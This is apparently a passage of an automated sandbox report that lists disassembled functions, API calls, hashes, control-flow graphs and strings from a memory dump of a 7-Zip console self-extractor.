                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: AttributesFilefree
                              • String ID:
                              • API String ID: 1936811914-0
                              • Opcode ID: d5df66043947abe2c4a22f88f0be180330a6ff37c290fd6690ffada23aa0e52b
                              • Instruction ID: ec812379451d7681d6553bc62ec506f3f9a3a3ea01590f758821f9ab5c0c2021
                              • Opcode Fuzzy Hash: d5df66043947abe2c4a22f88f0be180330a6ff37c290fd6690ffada23aa0e52b
                              • Instruction Fuzzy Hash: 9581B72322C78582DB70FB21E84176E7321FBC5754F549123EA8E87669DF2DC905A713
                              Function 00F86830 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 56COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: CloseHandle$ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                              • String ID: SeSecurityPrivilege
                              • API String ID: 1313864721-2333288578
                              • Opcode ID: 13693f38d7738a30ba756f3a7d22b965bb90a9711b1adfad48e363eb8eb3698f
                              • Instruction ID: d67850b38523ea2855c913eed4fce95ef7666c628edc062b9628ba6925d203a0
                              • Opcode Fuzzy Hash: 13693f38d7738a30ba756f3a7d22b965bb90a9711b1adfad48e363eb8eb3698f
                              • Instruction Fuzzy Hash: AB114C72604B4582DA519B12F9583BDB367FFC4B91F944126EA8F82E58CF3CC589EB10
                              Function 00F7BD0C Relevance: 9.0, APIs: 6, Instructions: 45COMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentProcess.KERNEL32 ref: 00F7BD1C
                              • OpenProcessToken.ADVAPI32 ref: 00F7BD2D
                              • LookupPrivilegeValueW.ADVAPI32 ref: 00F7BD41
                              • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?,?,?,?,00F839B9), ref: 00F7BD78
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00F839B9), ref: 00F7BD82
                              • CloseHandle.KERNELBASE ref: 00F7BD92
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                              • String ID:
                              • API String ID: 3398352648-0
                              • Opcode ID: d0eb4f3097e7eb5d21bf66f0fe04757f56b0f7c49c0d7fccda7d879dd754992b
                              • Instruction ID: 2295dce365f08a43d305d3a4b098cca574efb55cc0cffd36916ffcd43b95628e
                              • Opcode Fuzzy Hash: d0eb4f3097e7eb5d21bf66f0fe04757f56b0f7c49c0d7fccda7d879dd754992b
                              • Instruction Fuzzy Hash: 8B01527261464287DB209FB0F8947AE7361F780B95F549536EA8A83A54CF3CC449DB00
                              Function 00F78318 Relevance: 4.6, APIs: 3, Instructions: 70fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00F782EC: FindClose.KERNELBASE ref: 00F782FE
                              • FindFirstFileW.KERNELBASE ref: 00F7835A
                                • Part of subcall function 00F73730: free.MSVCRT ref: 00F7376A
                                • Part of subcall function 00F73730: memmove.MSVCRT(00000000,?,?,00000000,00F710B0), ref: 00F73785
                              • FindFirstFileW.KERNELBASE ref: 00F7839A
                              • free.MSVCRT ref: 00F783A8
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: Find$FileFirstfree$Closememmove
                              • String ID:
                              • API String ID: 2921071498-0
                              • Opcode ID: 230bb173f7b7721554616a5d78efc44195ac5eb57b7e025098c530a0a1adbf2a
                              • Instruction ID: 32c7790a4a0ca574eb7abdadbbd5d174dd9b3eadccee1f8bb827afaa18e4cfeb
                              • Opcode Fuzzy Hash: 230bb173f7b7721554616a5d78efc44195ac5eb57b7e025098c530a0a1adbf2a
                              • Instruction Fuzzy Hash: 94213072604A8086DB60DF28E8443597361F78ABB9F548312EABD477D9DF3CC546D701
                              Function 00FC971A Relevance: 119.8, APIs: 50, Strings: 18, Instructions: 768COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 311 fc971a-fc971d 312 fc9c9e-fc9cfd call fb5a44 call f72350 311->312 313 fc9723-fc9732 call f82ec8 311->313 332 fc9cff-fc9d12 call f736a8 312->332 333 fc9d14 312->333 318 fc9a6e-fc9a76 313->318 319 fc9738-fc973f 313->319 321 fc9a7c-fc9a8d call fc779c 318->321 322 fc9c42-fc9c4c 318->322 323 fc975e-fc97d8 call fc2ec8 call f7354c 319->323 324 fc9741-fc9748 319->324 342 fc9a8f-fc9a93 321->342 343 fc9a9a-fc9bac call fc6c40 call f72ecc call f72db8 call fa3054 call f72db8 call f72ecc call fc6e78 321->343 328 fc9c7e-fc9c9d _CxxThrowException 322->328 329 fc9c4e-fc9c79 call f724c4 fputs * 2 call f724c4 322->329 350 fc97da-fc97e1 323->350 351 fc97e5-fc9874 call f73798 call fc769c call f7354c 323->351 324->323 331 fc974a-fc9759 call f738a8 324->331 328->312 329->328 331->323 340 fc9d17-fc9d56 call fb5a44 call f72350 332->340 333->340 362 fc9d6d 340->362 363 fc9d58-fc9d6b call f736a8 340->363 342->343 403 fc9bde-fc9c3d free * 6 call fc6cd0 343->403 404 fc9bae 343->404 350->351 354 fc97e3 350->354 377 fc9876-fc987a 351->377 378 fc9881-fc9890 351->378 354->351 367 fc9d70-fc9f28 call f72350 362->367 363->367 385 fc9f2a-fc9f35 call fc6898 367->385 386 fc9f37 367->386 377->378 379 fc98a5 378->379 380 fc9892-fc9899 378->380 384 fc98ad-fc996b call f73798 call fc6c40 call f72db8 379->384 380->379 383 fc989b-fc98a3 380->383 383->384 417 fc996e call fb87ac 384->417 390 fc9f3a-fc9f45 385->390 386->390 394 fc9f47-fc9f50 390->394 395 fc9f51-fca014 call f73798 390->395 394->395 407 fca016-fca01a 395->407 408 fca020-fca0f5 call fc6184 call fc682c call f83d28 call f7354c call fa0eb4 395->408 416 fca849-fca850 403->416 409 fc9bb2-fc9bc8 404->409 407->408 456 fca13d-fca1b8 call f9dd64 408->456 457 fca0f7-fca11f call fa25dc 408->457 411 fc9bda-fc9bdc 409->411 412 fc9bca-fc9bd5 free * 2 409->412 411->403 411->409 412->411 419 fca860-fca863 416->419 420 fca852-fca859 416->420 421 fc9973-fc997e 417->421 424 fca865-fca881 _CxxThrowException 419->424 425 fca882-fca89d free 419->425 420->419 423 fca85b 420->423 426 fc998f-fc99d6 call fc6e78 421->426 427 fc9980-fc998a call fcb4d0 421->427 429 fca85b call fc6550 423->429 424->425 430 fca8bd-fca8dc free call fa8b60 call fc738c 425->430 431 fca89f 425->431 438 fc9a08-fc9a69 free * 3 call fc6cd0 free call fcb604 426->438 439 fc99d8 426->439 427->426 429->419 450 fca8e1-fca918 free call f71874 call fc7ec8 430->450 436 fca8a3-fca8bb free 431->436 436->430 436->436 438->416 442 fc99dc-fc99f2 439->442 446 fc9a04-fc9a06 442->446 447 fc99f4-fc99ff free * 2 442->447 446->438 446->442 447->446 466 fca94a-fca96b free 450->466 467 fca91a 450->467 461 fca1bd-fca1c7 456->461 457->456 468 fca121-fca13c _CxxThrowException 457->468 464 fca1c9-fca1cf call fcb4d0 461->464 465 fca1d4-fca1dc 461->465 464->465 470 fca1de-fca1e8 465->470 471 fca231-fca23e 465->471 472 fca91e-fca934 467->472 468->456 473 fca1ea-fca220 call f724c4 fputs call f724c4 call f72790 call f724c4 470->473 474 fca225-fca22d 470->474 477 fca2a0-fca2a7 471->477 478 fca240-fca243 call f724c4 471->478 475 fca946-fca948 472->475 476 fca936-fca941 free * 2 472->476 473->474 474->471 475->466 475->472 476->475 481 fca2a9-fca2ae 477->481 482 fca2d7-fca2de 477->482 483 fca248-fca250 478->483 481->482 487 fca2b0-fca2d2 fputs call f7263c call f724c4 481->487 484 fca2e0-fca2e5 482->484 485 fca312-fca315 482->485 483->477 488 fca252-fca29b fputs call f7263c call f724c4 fputs call f7263c call f724c4 483->488 489 fca388-fca38f 484->489 490 fca2eb-fca30d fputs call f7263c call f724c4 484->490 485->489 491 fca317-fca31e 485->491 487->482 488->477 496 fca3d0-fca3d3 489->496 497 fca391-fca396 489->497 490->485 498 fca347-fca34e 491->498 499 fca320-fca342 fputs call f7263c call f724c4 491->499 505 fca3d5 496->505 509 fca3e0-fca3e3 496->509 504 fca398-fca3a7 call f724c4 497->504 497->505 498->489 508 fca350-fca35f call f724c4 498->508 499->498 504->505 532 fca3a9-fca3cb fputs call f7263c call f724c4 504->532 505->509 508->489 527 fca361-fca383 fputs call f7263c call f724c4 508->527 511 fca3e9-fca3f0 509->511 512 fca594-fca7a9 free * 2 call fa0c24 free call fc786c 509->512 520 fca55b-fca56a call f724c4 511->520 521 fca3f6-fca3fd 511->521 562 fca7dc-fca7f8 free 512->562 563 fca7ab 512->563 520->512 544 fca56c-fca593 fputs call f7263c call f724c4 520->544 521->520 529 fca403-fca406 521->529 527->489 529->512 535 fca40c-fca417 529->535 532->496 541 fca449-fca452 535->541 542 fca419-fca441 fputs call f7263c call f724c4 535->542 548 fca454-fca457 541->548 549 fca467-fca48a fputs call f7263c call f724c4 541->549 542->541 544->512 548->549 554 fca459-fca461 548->554 568 fca48f-fca497 549->568 554->549 559 fca4e9-fca537 fputs call f7263c call f724c4 fputs call f7263c call f724c4 554->559 588 fca53c-fca53f 559->588 571 fca7fa 562->571 572 fca82b-fca83a free 562->572 569 fca7af-fca7c5 563->569 568->559 573 fca499-fca4e4 fputs call f7263c call f724c4 fputs call f7263c call f724c4 568->573 574 fca7d7-fca7da 569->574 575 fca7c7-fca7d2 free * 2 569->575 577 fca7fe-fca814 571->577 572->416 573->559 574->562 574->569 575->574 580 fca826-fca829 577->580 581 fca816-fca821 free * 2 577->581 580->572 580->577 581->580 588->512 590 fca541-fca559 call f724c4 call fc2354 588->590 590->512
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$ExceptionThrowfputs$fputc
                              • String ID: 7zCon.sfx$Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$ERROR: $Files: $Folders: $Incorrect command line$OK archives: $Open Errors: $Size: $Sub items Errors: $Warnings:
                              • API String ID: 1639683984-435538426
                              • Opcode ID: 5955122702003f69023d9f82adba55d8a6b5774e256a29e9b2a1d40bb052a14f
                              • Instruction ID: d2b3e162d32f513444c6633f43bd52404ac9e15dab6852c9593537bc0f0c519e
                              • Opcode Fuzzy Hash: 5955122702003f69023d9f82adba55d8a6b5774e256a29e9b2a1d40bb052a14f
                              • Instruction Fuzzy Hash: F572BA32609AC295CA74EF25E9917EEB361F785B84F40802BCA8D43B1ADF3CC555EB01
                              Function 00FC9DFD Relevance: 86.2, APIs: 34, Strings: 15, Instructions: 500COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1181 fc9dfd-fc9dff 1182 fc9e19-fc9ebf call fbfde4 call f7354c call f9c0c8 free 1181->1182 1183 fc9e01-fc9e14 fputs call f724c4 1181->1183 1191 fc9ed0-fc9ed3 1182->1191 1192 fc9ec1-fc9ecb call fcb4d0 1182->1192 1183->1182 1194 fc9ef4-fc9f28 call fcb604 call f72350 1191->1194 1195 fc9ed5-fc9edc 1191->1195 1192->1191 1205 fc9f2a-fc9f35 call fc6898 1194->1205 1206 fc9f37 1194->1206 1195->1194 1196 fc9ede-fc9eee call fc01fc 1195->1196 1200 fc9ef3 1196->1200 1200->1194 1208 fc9f3a-fc9f45 1205->1208 1206->1208 1210 fc9f47-fc9f50 1208->1210 1211 fc9f51-fca014 call f73798 1208->1211 1210->1211 1215 fca016-fca01a 1211->1215 1216 fca020-fca0f5 call fc6184 call fc682c call f83d28 call f7354c call fa0eb4 1211->1216 1215->1216 1227 fca13d-fca1c7 call f9dd64 1216->1227 1228 fca0f7-fca11f call fa25dc 1216->1228 1233 fca1c9-fca1cf call fcb4d0 1227->1233 1234 fca1d4-fca1dc 1227->1234 1228->1227 1235 fca121-fca13c _CxxThrowException 1228->1235 1233->1234 1237 fca1de-fca1e8 1234->1237 1238 fca231-fca23e 1234->1238 1235->1227 1239 fca1ea-fca220 call f724c4 fputs call f724c4 call f72790 call f724c4 1237->1239 1240 fca225-fca22d 1237->1240 1241 fca2a0-fca2a7 1238->1241 1242 fca240-fca243 call f724c4 1238->1242 1239->1240 1240->1238 1245 fca2a9-fca2ae 1241->1245 1246 fca2d7-fca2de 1241->1246 1247 fca248-fca250 1242->1247 1245->1246 1251 fca2b0-fca2d2 fputs call f7263c call f724c4 1245->1251 1248 fca2e0-fca2e5 1246->1248 1249 fca312-fca315 1246->1249 1247->1241 1252 fca252-fca29b fputs call f7263c call f724c4 fputs call f7263c call f724c4 1247->1252 1253 fca388-fca38f 1248->1253 1254 fca2eb-fca30d fputs call f7263c call f724c4 1248->1254 1249->1253 1255 fca317-fca31e 1249->1255 1251->1246 1252->1241 1260 fca3d0-fca3d3 1253->1260 1261 fca391-fca396 1253->1261 1254->1249 1262 fca347-fca34e 1255->1262 1263 fca320-fca342 fputs call f7263c call f724c4 1255->1263 1269 fca3d5 1260->1269 1273 fca3e0-fca3e3 1260->1273 1268 fca398-fca3a7 call f724c4 1261->1268 1261->1269 1262->1253 1272 fca350-fca35f call f724c4 1262->1272 1263->1262 1268->1269 1296 fca3a9-fca3cb fputs call f7263c call f724c4 1268->1296 1269->1273 1272->1253 1291 fca361-fca383 fputs call f7263c call f724c4 1272->1291 1275 fca3e9-fca3f0 1273->1275 1276 fca594-fca7a9 free * 2 call fa0c24 free call fc786c 1273->1276 1284 fca55b-fca56a call f724c4 1275->1284 1285 fca3f6-fca3fd 1275->1285 1326 fca7dc-fca7f8 free 1276->1326 1327 fca7ab 1276->1327 1284->1276 1308 fca56c-fca593 fputs call f7263c call f724c4 1284->1308 1285->1284 1293 fca403-fca406 1285->1293 1291->1253 1293->1276 1299 fca40c-fca417 1293->1299 1296->1260 1305 fca449-fca452 1299->1305 1306 fca419-fca441 fputs call f7263c call f724c4 1299->1306 1312 fca454-fca457 1305->1312 1313 fca467-fca48a fputs call f7263c call f724c4 1305->1313 1306->1305 1308->1276 1312->1313 1318 fca459-fca461 1312->1318 1332 fca48f-fca497 1313->1332 1318->1313 1323 fca4e9-fca537 fputs call f7263c call f724c4 fputs call f7263c call f724c4 1318->1323 1363 fca53c-fca53f 1323->1363 1335 fca7fa 1326->1335 1336 fca82b-fca850 free 1326->1336 1333 fca7af-fca7c5 1327->1333 1332->1323 1337 fca499-fca4e4 fputs call f7263c call f724c4 fputs call f7263c call f724c4 1332->1337 1339 fca7d7-fca7da 1333->1339 1340 fca7c7-fca7d2 free * 2 1333->1340 1342 fca7fe-fca814 1335->1342 1344 fca860-fca863 1336->1344 1345 fca852-fca859 1336->1345 1337->1323 1339->1326 1339->1333 1340->1339 1347 fca826-fca829 1342->1347 1348 fca816-fca821 free * 2 1342->1348 1351 fca865-fca881 _CxxThrowException 1344->1351 1352 fca882-fca89d free 1344->1352 1345->1344 1350 fca85b call fc6550 1345->1350 1347->1336 1347->1342 1348->1347 1350->1344 1351->1352 1356 fca8bd-fca8dc free call fa8b60 call fc738c 1352->1356 1357 fca89f 1352->1357 1371 fca8e1-fca918 free call f71874 call fc7ec8 1356->1371 1361 fca8a3-fca8bb free 1357->1361 1361->1356 1361->1361 1363->1276 1366 fca541-fca559 call f724c4 call fc2354 1363->1366 1366->1276 1379 fca94a-fca96b free 1371->1379 1380 fca91a 1371->1380 1381 fca91e-fca934 1380->1381 1382 fca946-fca948 1381->1382 1383 fca936-fca941 free * 2 1381->1383 1382->1379 1382->1381 1383->1382
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: fputcfputsfree
                              • String ID: Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Scanning the drive for archives:$Size: $Warnings:
                              • API String ID: 2822829076-727241755
                              • Opcode ID: 067a8c7e4fc7e37eecfa726413d9de64729ccea8d662f94fbd9b6a9cf1d7a761
                              • Instruction ID: 7165d90dc6b4cd6873a5e36b5ba8f75a181c6c8008d1ecf73fca0b7643b93992
                              • Opcode Fuzzy Hash: 067a8c7e4fc7e37eecfa726413d9de64729ccea8d662f94fbd9b6a9cf1d7a761
                              • Instruction Fuzzy Hash: 8722C132709AC692CA74EB25E9913EEB361F785B84F44802BDA8D03B59CF3CC555E702
                              Function 00FA8CBC Relevance: 51.1, APIs: 25, Strings: 4, Instructions: 368libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2063 fa8cbc-fa8d25 GetProcAddress * 2 2064 fa8d50-fa8d66 GetProcAddress 2063->2064 2065 fa8d27-fa8d3a GetProcAddress 2063->2065 2066 fa8d68-fa8d6a 2064->2066 2067 fa8d6f-fa8d7a 2064->2067 2065->2067 2068 fa8d3c-fa8d49 2065->2068 2069 fa92e2-fa92f5 2066->2069 2070 fa92e0 2067->2070 2071 fa8d80-fa8e34 call f7354c call fa760c 2067->2071 2068->2067 2075 fa8d4b 2068->2075 2070->2069 2078 fa8e3a-fa8e4e 2071->2078 2079 fa91e4 2071->2079 2075->2069 2080 fa8e60-fa8e65 2078->2080 2081 fa8e50-fa8e5e 2078->2081 2082 fa92cf-fa92de call fa1784 2079->2082 2086 fa8e6c-fa8e6f 2080->2086 2081->2086 2082->2069 2087 fa8e8e-fa8e94 2086->2087 2088 fa8e71-fa8e89 call f7be6c call fa1784 2086->2088 2089 fa8eb3-fa8ec1 SysStringByteLen 2087->2089 2090 fa8e96-fa8eae call f7be6c call fa1784 2087->2090 2104 fa91d0-fa91d9 2088->2104 2094 fa91e9-fa91f9 call f7be6c 2089->2094 2095 fa8ec7-fa8f27 call f7bf00 call f7be6c call f7354c * 2 call fa760c 2089->2095 2090->2104 2094->2082 2115 fa91fe-fa9214 free * 2 2095->2115 2116 fa8f2d-fa8f50 call fa760c 2095->2116 2104->2071 2107 fa91df 2104->2107 2107->2070 2115->2082 2119 fa9219-fa922f free * 2 2116->2119 2120 fa8f56-fa8fc9 call fa8580 call fa748c call fa7544 2116->2120 2119->2082 2127 fa8fcf-fa8fe0 2120->2127 2128 fa9234-fa924a free * 2 2120->2128 2129 fa9032-fa9065 call fa7544 2127->2129 2130 fa8fe2-fa8fe9 2127->2130 2128->2082 2136 fa906b-fa9098 call fa7eb0 2129->2136 2137 fa924f-fa9265 free * 2 2129->2137 2131 fa8fef-fa901d call fa748c 2130->2131 2138 fa9029-fa9030 2131->2138 2139 fa901f-fa9022 2131->2139 2142 fa909e-fa90a3 2136->2142 2143 fa9267-fa9288 free * 3 2136->2143 2137->2082 2138->2129 2138->2131 2139->2138 2144 fa90cb-fa90ee call fa7eb0 2142->2144 2145 fa90a5-fa90c9 call fb5a44 call f9fe74 2142->2145 2143->2082 2151 fa928a-fa92ab free * 3 2144->2151 2152 fa90f4-fa9108 call fa8798 2144->2152 2155 fa910d-fa9141 call fa7544 2145->2155 2151->2082 2152->2155 2158 fa92ad-fa92cc free * 3 2155->2158 2159 fa9147-fa914a 2155->2159 2158->2082 2160 fa9159-fa9167 call fb5a44 call f72350 2159->2160 2161 fa914c-fa9154 2159->2161 2165 fa916c-fa9177 2160->2165 2161->2160 2166 fa9179-fa918c call fa18a8 2165->2166 2167 fa918e 2165->2167 2169 fa9191-fa91cb free * 3 call fa1784 2166->2169 2167->2169 2169->2104
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: AddressProc
                              • String ID: GetHandlerProperty$GetHandlerProperty2$GetIsArc$GetNumberOfFormats
                              • API String ID: 190572456-3984264347
                              • Opcode ID: 1f70778ba01c17241a307a25a73a55545ac7aa42571749a48baa1ee7a2c8c9a9
                              • Instruction ID: 67688dad34759acf10b4a0097233611450cf4b7d5cb3e9e8e9ecc62d5f11c10f
                              • Opcode Fuzzy Hash: 1f70778ba01c17241a307a25a73a55545ac7aa42571749a48baa1ee7a2c8c9a9
                              • Instruction Fuzzy Hash: E6E1827221DBC496CB60EB21E88079EB7A5F7C6B80F404522EA8E47B19DF7CC555EB01
                              Function 00F8AC94 Relevance: 39.6, APIs: 22, Strings: 4, Instructions: 602COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00F8A7E4: free.MSVCRT ref: 00F8A987
                              • free.MSVCRT ref: 00F8AD79
                              • free.MSVCRT ref: 00F8ADFE
                              • free.MSVCRT ref: 00F8AE8E
                                • Part of subcall function 00F8A9FC: free.MSVCRT ref: 00F8AA50
                                • Part of subcall function 00F8A9FC: free.MSVCRT ref: 00F8AA58
                                • Part of subcall function 00F8A9FC: free.MSVCRT ref: 00F8AA8F
                                • Part of subcall function 00F8A9FC: free.MSVCRT ref: 00F8AA97
                                • Part of subcall function 00F8A9FC: free.MSVCRT ref: 00F8AAA5
                              • free.MSVCRT ref: 00F8AEE8
                              • free.MSVCRT ref: 00F8AF13
                              • free.MSVCRT ref: 00F8AF2A
                              • free.MSVCRT ref: 00F8AF5B
                              • free.MSVCRT ref: 00F8AF9C
                                • Part of subcall function 00F8728C: free.MSVCRT ref: 00F875ED
                              • free.MSVCRT ref: 00F8B56F
                              Strings
                              • Cannot create hard link, xrefs: 00F8B0CC
                              • Cannot seek to begin of file, xrefs: 00F8B3D8
                              • Cannot open output file, xrefs: 00F8B19B
                              • Cannot set length for output file, xrefs: 00F8B389
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID: Cannot create hard link$Cannot open output file$Cannot seek to begin of file$Cannot set length for output file
                              • API String ID: 1294909896-1337951305
                              • Opcode ID: a04a168ff9dc1034c665fe7f9fa15fe45a2cd22c26bc97128ca1d1a293480453
                              • Instruction ID: b5cd89864e2985813073f53e9a931ffc1277798f4410b35f9295ee70e627e208
                              • Opcode Fuzzy Hash: a04a168ff9dc1034c665fe7f9fa15fe45a2cd22c26bc97128ca1d1a293480453
                              • Instruction Fuzzy Hash: 6832C573708AC496CB64FF25D8902ED7720F785B90F549022EB9E4BB15DF29C8A6E301
                              Function 00F83760 Relevance: 38.8, APIs: 14, Strings: 8, Instructions: 264COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2497 f83760-f837a4 call f71648 2500 f837ca-f8381b _isatty * 3 2497->2500 2501 f837a6-f837c9 call f986a8 _CxxThrowException 2497->2501 2503 f8381d-f83821 2500->2503 2504 f8382e 2500->2504 2501->2500 2503->2504 2506 f83823-f83827 2503->2506 2507 f83833-f83864 2504->2507 2506->2504 2510 f83829-f8382c 2506->2510 2508 f83892-f838ae 2507->2508 2509 f83866-f8388d call f82c88 call f72ecc free 2507->2509 2512 f838bc 2508->2512 2513 f838b0-f838b4 2508->2513 2509->2508 2510->2507 2516 f838c3-f838c7 2512->2516 2513->2512 2515 f838b6-f838ba 2513->2515 2515->2512 2515->2516 2518 f838c9 2516->2518 2519 f838d0-f838da 2516->2519 2518->2519 2521 f838e8-f838f2 2519->2521 2522 f838dc-f838e2 2519->2522 2523 f83900-f8390a 2521->2523 2524 f838f4-f838fa 2521->2524 2522->2521 2525 f83918-f83922 2523->2525 2526 f8390c-f83912 2523->2526 2524->2523 2527 f83988-f83992 2525->2527 2528 f83924-f83932 2525->2528 2526->2525 2531 f839ab-f839c2 call f7bd0c * 2 2527->2531 2532 f83994-f839a7 2527->2532 2529 f83940-f83953 call f82e88 2528->2529 2530 f83934-f8393e 2528->2530 2538 f8397b-f83982 2529->2538 2539 f83955-f8397a call f986a8 _CxxThrowException 2529->2539 2530->2527 2540 f839c7-f839d1 2531->2540 2532->2531 2538->2527 2539->2538 2542 f83a72-f83a7c 2540->2542 2543 f839d7-f839f0 2540->2543 2547 f83a82-f83a90 2542->2547 2548 f83b97-f83ba1 2542->2548 2545 f839f9-f83a0c wcscmp 2543->2545 2546 f839f2-f839f7 2543->2546 2549 f83a50-f83a57 call f7bda4 2545->2549 2550 f83a0e-f83a21 call f82e88 2545->2550 2546->2549 2547->2548 2551 f83a96-f83add call f72db8 call f72f28 call f739f0 call f74750 2547->2551 2549->2542 2561 f83a59-f83a6c call fcd8c0 call f7bd0c 2549->2561 2558 f83a49 2550->2558 2559 f83a23-f83a48 call f986a8 _CxxThrowException 2550->2559 2573 f83aec-f83af1 2551->2573 2574 f83adf-f83ae9 2551->2574 2558->2549 2559->2558 2561->2542 2575 f83b19-f83b48 call f71c80 call f739f0 GetCurrentProcess SetProcessAffinityMask 2573->2575 2576 